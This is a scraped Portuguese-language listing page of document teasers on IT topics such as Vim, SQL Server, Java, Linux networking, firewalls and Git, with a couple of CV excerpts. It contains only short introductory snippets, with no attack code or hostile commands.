http://aurelio.net/vim/vim-basico.txt Entrar neste site/arquivo e estudar esse aplicativo Prof. Ricardo César de Carvalho vi http://aurelio.net/vim/vim-basico.txt Entrar neste site/arquivo e estudar esse aplicativo Administração de Redes de Computadores Resumo de Serviços em Rede Linux Controlador de Domínio Servidor DNS

Leia mais

Data Transformation Services (DTS) por Anderson Ferreira Souza

Data Transformation Services (DTS) por Anderson Ferreira Souza Data Transformation Services (DTS) por Anderson Ferreira Souza O Sql Server possui um recurso extremamente poderoso que é muito pouco utilizado pelos administradores e programadores. Com certeza, sendo

Leia mais

Programação de Computadores e Robocode. http://www.lac.inpe.br/~rafael.santos

Programação de Computadores e Robocode. http://www.lac.inpe.br/~rafael.santos Programação de Computadores e Robocode 1 O que é Programação de Computadores? O que é um programa de computador? Quem escreve estes programas? Como são escritos? O que podemos fazer com estes programas?

Leia mais

M O D E L O E U R O P E U D E C U R R I C U L U M V I T A E

M O D E L O E U R O P E U D E C U R R I C U L U M V I T A E M O D E L O E U R O P E U D E C U R R I C U L U M V I T A E INFORMAÇÃO PESSOAL Nome TRINDADE, António Miguel Ferreira Marques Morada Rua Adelino Amaro da Costa, 9, 4.º ESQ., 2720-002 Amadora Telefone +351

Leia mais

Esse documento está licenciado pela licença Creative Commons Atribuição-Uso Não-Comercial-Compatilhamento pela mesma licença 3.0.

Esse documento está licenciado pela licença Creative Commons Atribuição-Uso Não-Comercial-Compatilhamento pela mesma licença 3.0. Esse documento está licenciado pela licença Creative Commons Atribuição-Uso Não-Comercial-Compatilhamento pela mesma licença 3.0. Para saber o que você pode fazer ou não com este arquivo, leia este link

Leia mais

Bacharelado em Ciência e Tecnologia Processamento da Informação. Equivalência Portugol Java. Linguagem Java

Bacharelado em Ciência e Tecnologia Processamento da Informação. Equivalência Portugol Java. Linguagem Java Linguagem Java Objetivos Compreender como desenvolver algoritmos básicos em JAVA Aprender como escrever programas na Linguagem JAVA baseando-se na Linguagem Portugol aprender as sintaxes equivalentes entre

Leia mais

GBD. Introdução PROF. ANDREZA S. AREÃO

GBD. Introdução PROF. ANDREZA S. AREÃO GBD Introdução PROF. ANDREZA S. AREÃO Sistema de arquivos X Sistemas de Banco de Dados Sistema de arquivos Sistema de Banco de Dados Aplicativos Dados (arquivos) Aplicativos SGBD Dados (arquivos) O acesso/gerenciamento

Leia mais

Passos Preliminares: Acessando a máquina virtual via ssh.

Passos Preliminares: Acessando a máquina virtual via ssh. CIn/UFPE Sistemas de Informação Redes de Computadores Professor: Kelvin Lopes Dias Monitor: Edson Adriano Maravalho Avelar {kld,eama}@cin.ufpe.br Instalando/Configurando Servidor DNS. Este tutorial irá

Leia mais

O B J E T T I I V V O O S

O B J E T T I I V V O O S O B J E T I V O S - Conhecer as características e possibilidades do SO Linux, como workstation simples ou elemento componente de uma rede; - Adquirir noções sobre as atuais exigências de segurança eletrônica

Leia mais

BD SQL Server. Licenciatura em Engenharia Informática e Computação. Bases de Dados 2003/04

BD SQL Server. Licenciatura em Engenharia Informática e Computação. Bases de Dados 2003/04 BD SQL Server SGBD SQL Server Licenciatura em Engenharia Informática e Computação Bases de Dados 2003/04 BD SQL Server Criação da Ligação ao SGBD Entrar no Microsoft SQL Server / Enterprise Manager Criar

Leia mais

Professor: Douglas Sousa Cursos de Computação

Professor: Douglas Sousa Cursos de Computação Linguagem de Programação C# Professor: Douglas Sousa Cursos de Computação Agenda Conceitos Básicos; Principais Características; Visual Studio; Meu Primeiro Programa; A Linguagem C#; Sistemas de Tipos;

Leia mais

MANDRIVA CONECTIVA LINUX - ADMINISTRAÇÃO DE SISTEMAS E REDES

MANDRIVA CONECTIVA LINUX - ADMINISTRAÇÃO DE SISTEMAS E REDES www.lanuniversity.com.br MANDRIVA CONECTIVA LINUX - ADMINISTRAÇÃO DE SISTEMAS E REDES Preparatório para certificações Mandriva Systems Administrator, Mandriva Network Administrator, e exames do LPI Nível

Leia mais

da mão-de-obra de TI da América Latina está no Brasil (considerado o maior empregador do setor) seguido pelo México com 23%.

da mão-de-obra de TI da América Latina está no Brasil (considerado o maior empregador do setor) seguido pelo México com 23%. Informações de Tecnologia A tecnologia virou ferramenta indispensável para as pessoas trabalharem, se comunicarem e até se divertirem. Computação é a área que mais cresce no mundo inteiro! Esse constante

Leia mais

ATENÇÃO: Este post é atualizado toda vez que alguma função é inserida ou removida da ferramenta.

ATENÇÃO: Este post é atualizado toda vez que alguma função é inserida ou removida da ferramenta. Cangibrina Dashboard Finder 11 DE SETEMBRO DE 2015 ATENÇÃO: Este post é atualizado toda vez que alguma função é inserida ou removida da ferramenta. Hoje trarei uma ferramenta desenvolvida por mim mesmo

Leia mais

Curso Introdução ao Linux. Desmistificando o Software Livre. Nícholas André - www.iotecnologia.com.br - nicholas@iotecnologia.com.

Curso Introdução ao Linux. Desmistificando o Software Livre. Nícholas André - www.iotecnologia.com.br - nicholas@iotecnologia.com. Curso Introdução ao Linux Desmistificando o Software Livre Nícholas André - www.iotecnologia.com.br - nicholas@iotecnologia.com.br Índice 1 O que é Software Livre? 2 A história por trás do Software Livre.

Leia mais

BANCO DE DADOS II. AULA MySQL.

BANCO DE DADOS II. AULA MySQL. UNIVERSIDADE FEDERAL DE SANTA MARIA - UFSM COLÉGIO AGRÍCOLA DE FREDERICO WESTPHALEN BANCO DE DADOS II BANCO DE DADOS II AULA MySQL. DISCIPLINA: Banco de Dados II PROF.: ROMULO VANZIN Data: 27/06/2014 Banco

Leia mais

Fernando Nunes da Silva

Fernando Nunes da Silva Fernando Nunes da Silva Dados Pessoais Data de nascimento: 02/12/1989 Idade: 22 Sexo: Masculino Cidade: Carlópolis-Pr / Brasil CEP: 86420-000 Endereço: Rua Marcos Rodrigues do Amaral Nº 224 Bairro: Centro

Leia mais

Implementando uma Classe e Criando Objetos a partir dela

Implementando uma Classe e Criando Objetos a partir dela Análise e Desenvolvimento de Sistemas ADS Programação Orientada a Obejeto POO 3º Semestre AULA 04 - INTRODUÇÃO À PROGRAMAÇÃO ORIENTADA A OBJETO (POO) Parte: 2 Prof. Cristóvão Cunha Implementando uma Classe

Leia mais

Processamento Distribuído em Cluster do Tipo Beowulf

Processamento Distribuído em Cluster do Tipo Beowulf UNIVERSIDADE ESTADUAL PAULISTA JULIO DE MESQUITA FILHO FACULDADE DE TECNOLOGIA DA BAIXADA SANTISTA DEPARTAMENTO DE INFORMÁTICA GESTÃO DE NEGÓCIOS Processamento Distribuído em Cluster do Tipo Beowulf ALEXANDRE

Leia mais

SolarWinds Kiwi Syslog Server

SolarWinds Kiwi Syslog Server SolarWinds Kiwi Syslog Server Monitoramento de syslog fácil de usar e econômico O Kiwi Syslog Server oferece aos administradores de TI o software de gerenciamento mais econômico do setor. Fácil de instalar

Leia mais

Introdução ao Git. Laboratório de Programação. Luísa Lima, Pedro Vasconcelos, DCC/FCUP. Março 2015

Introdução ao Git. Laboratório de Programação. Luísa Lima, Pedro Vasconcelos, DCC/FCUP. Março 2015 Introdução ao Git Laboratório de Programação Luísa Lima, Pedro Vasconcelos, DCC/FCUP Março 2015 Porquê controlo de versões? Um sistema de controlo de versões (VCS) é um ferramenta integrada que possibilita

Leia mais

Energia Open Source. Semana do Gestor de Projectos - APOGEP

Energia Open Source. Semana do Gestor de Projectos - APOGEP Semana do Gestor de Projectos - APOGEP 1 Gestão de Projectos Open Source: O caso Magalhães Semana do Gestor de Projectos Lisboa 16 de Setembro de 2009 Paulo Trezentos Paulo.Trezentos@caixamagica.pt A nossa

Leia mais

Redes de Computadores

Redes de Computadores Redes de Computadores LAMP Gustavo Reis gustavo.reis@ifsudestemg.edu.br Acrônico para a combinação de Linux, Apache, MySQL e PHP ou Perl ou Python; Recentemente a letra P começou a fazer referência a Perl

Leia mais

Fábio Giordani. Técnico em Processamento de Dados Adm. Análise de Sistemas. Outros cursos. Coordenador Projetos e Consultoria em Infraestrutura

Fábio Giordani. Técnico em Processamento de Dados Adm. Análise de Sistemas. Outros cursos. Coordenador Projetos e Consultoria em Infraestrutura Fábio Giordani Técnico em Processamento de Dados Adm. Análise de Sistemas Cobol Developer (Caracter mode ;-) DBA (Oracle 7.1...) Developer (GUI) Java Outros cursos Coordenador Projetos e Consultoria em

Leia mais

JPA: Persistência padronizada em Java

JPA: Persistência padronizada em Java JPA: Persistência padronizada em Java FLÁVIO HENRIQUE CURTE Bacharel em Engenharia de Computação flaviocurte.java@gmail.com Programação Orientada a Objetos X Banco de Dados Relacionais = Paradigmas diferentes

Leia mais

AS CONSULTORIA & TREINAMENTOS. www.astreinamentos.com.br. White Paper pfsense

AS CONSULTORIA & TREINAMENTOS. www.astreinamentos.com.br. White Paper pfsense White Paper pfsense W h i t e p a p e r - p f S e n s e 2 SUMÁRIO Visão Geral... 3 pfsense é fácil de implementar e gerenciar... 3 Hardware... 3 Recursos do pfsense... 4 Fontes... 6 W h i t e p a p e r

Leia mais

CET GRSI 2011. Sistema Operativo de Rede. António Paulo Santos aps@estgf.ipp.pt

CET GRSI 2011. Sistema Operativo de Rede. António Paulo Santos aps@estgf.ipp.pt CET GRSI 2011 Sistema Operativo de Rede António Paulo Santos aps@estgf.ipp.pt O que é um S.O. de Rede? Sistema operativo que incluí: funções especiais que permitem a ligação de um computador a uma LAN.

Leia mais

CONSULTORIA REMOTA BANCO DE DADOS SQL SERVER

CONSULTORIA REMOTA BANCO DE DADOS SQL SERVER CONSULTORIA REMOTA BANCO DE DADOS SQL SERVER Fabrício França Lima MCITP Database Administrator http://fabriciolima.net EXPERIÊNCIA Trabalho desde 2006 com SQL Server em um ambiente de banco de dados crítico

Leia mais

Acesso a Bancos de Dados em Java (JDBC)

Acesso a Bancos de Dados em Java (JDBC) Acesso a Bancos de Dados em Java (JDBC) Jomi Fred Hübner Universidade Regional de Blumenau Departamento de Sistemas e Computação Roteiro Introdução Objetivo da JDBC Vantagens Visão geral do acesso a SGBDs

Leia mais

Ferramentas Livres para Monitoramento de Redes

Ferramentas Livres para Monitoramento de Redes Ferramentas Livres para Monitoramento de Redes SOBRE A AUTORA Estudante de graduação do curso de Bacharelado em Informática Biomédica da Universidade Federal do Paraná (UFPR). Atualmente participa do grupo

Leia mais

Enviado dados para o PHP através de formulário

Enviado dados para o PHP através de formulário Enviado dados para o PHP através de formulário Bom galera, eu estive um tempo parado sem postar nada aqui no blog, mas prometo que vou tentar voltar a ativa. Mas vamos deixar de conversa e vamos ao que

Leia mais

O QUE É O ZIMBRA? CONFIGURAÇÃO, IMPLANTAÇÃO E SUPORTE

O QUE É O ZIMBRA? CONFIGURAÇÃO, IMPLANTAÇÃO E SUPORTE O QUE É O ZIMBRA? Zimbra é uma solução corporativa de e-mail, calendário e colaboração criado para a nuvem. Com uma interface web totalmente redesenhada, o Zimbra oferece, atualmente, a experiência com

Leia mais

Sistemas Operacionais

Sistemas Operacionais Sistemas Operacionais Aula 01 - Introdução Edirlei Soares de Lima O que é um sistema operacional? Um computador moderno consiste em: Um ou mais processadores; Memória principal;

Leia mais

Ataques e Intrusões. Invasões Trashing e Engenharia Social. Classificação de Hackers

Ataques e Intrusões. Invasões Trashing e Engenharia Social. Classificação de Hackers Ataques e Intrusões Professor André Cardia andre@andrecardia.pro.br msn: andre.cardia@gmail.com Ataques e Intrusões O termo genérico para quem realiza um ataque é Hacker. Essa generalização, tem, porém,

Leia mais

FIREWALL. Prof. Fabio de Jesus Souza. fabiojsouza@gmail.com. Professor Fabio Souza

FIREWALL. Prof. Fabio de Jesus Souza. fabiojsouza@gmail.com. Professor Fabio Souza FIREWALL Prof. Fabio de Jesus Souza fabiojsouza@gmail.com Professor Fabio Souza O que são Firewalls? Os firewalls são sistemas de segurança que podem ser baseados em: um único elemento de hardware; um

Leia mais

Tecnologia para Integração de Serviços. Introdução

Tecnologia para Integração de Serviços. Introdução Introdução Carlos Gustavo A. da Rocha Introdução Historicamente sistemas de comunicação foram desenvolvidos para dar suporte a um tipo específico de informação, por exemplo: Sistema telefônico: Tráfego

Leia mais